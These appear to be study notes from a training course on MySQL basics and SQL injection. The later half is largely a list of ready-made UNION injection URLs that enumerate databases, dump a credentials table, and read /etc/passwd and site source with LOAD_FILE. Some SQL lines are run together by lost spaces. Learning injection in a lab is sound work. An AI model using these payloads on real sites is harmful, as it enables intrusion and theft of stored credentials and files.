It is also possible the password directly into the command, though this should be avoided, as it could lead to the password being kept in logs and terminal history:
mysql -u<username>-p<password>
Tip: There shouldn't be any spaces between '-p' and the password.
mysql -u<username>-h<host>-P<port>-p
CREATE DATABASE users;
SHOW DATABASES;
USE users;
database name is case sensitive
CREATETABLElogins ( id INT, username VARCHAR(100),passwordVARCHAR(100), date_of_joining DATETIME );
SHOW TABLES;
DESCRIBE logins;
id INTNOT NULL AUTO_INCREMENT,
username VARCHAR(100) UNIQUENOT NULL,
date_of_joining DATETIMEDEFAULTNOW(),
Skipping inserting default values for the columns
Query
Note: String and date data types should be surrounded by single quote (') or double quotes ("), while numbers can be used directly.
The % symbol acts as a wildcard and matches all characters after admin.
The _ symbol is used to match exactly one character.
SQL Operators
In MySQL terms, any non-zero value is considered true, and it usually returns the value 1 to signify true. 0 is considered false.
The AND, OR and NOT operators can also be represented as &&, || and !, respectively.
SQL Injections
For example, if we search for 1'; DROP TABLE users;, the search input would be:
We can use two types of line comments with MySQL -- and #
In order to use (#) as a comment within a browser, we can use '%23', which is an URL encoded (#) symbol.
Union
Tip: For advanced SQL injection, we may want to simply use 'NULL' to fill other columns, as 'NULL' fits all data types.
Detect Number of Columns
Using ORDER BY
Using UNION
http://SERVER_IP:PORT/search.php?port_code=' order by 1-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,2,3-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,@@version,3,4-- -
Database Enumeration
MySQL Fingerprinting
Payload
When to Use
Expected Output
Wrong Output
SELECT @@version
When we have full query output
MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'
In MSSQL it returns MSSQL version. Error with other DBMS.
SELECT POW(1,1)
When we only have numeric output
1
Error with other DBMS
SELECT SLEEP(5)
Blind/No Output
Delays page response for 5 seconds and returns 0.
Will not delay response with other DBMS
INFORMATION_SCHEMA Database
SCHEMATA
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,database(),2,3-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Data
http://SERVER_IP:PORT/search.php?port_code=cn' UNION select 1, username, password, 4 from dev.credentials-- -
Reading Files
DB User
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, user(), 3, 4-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
LOAD_FILE
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4-- -
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, LOAD_FILE('/var/www/html/search.php'), 3, 4-- -
Writing Files
secure_file_priv
http://SERVER_IP:PORT/search.php?port_code=cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name='secure_file_priv'-- -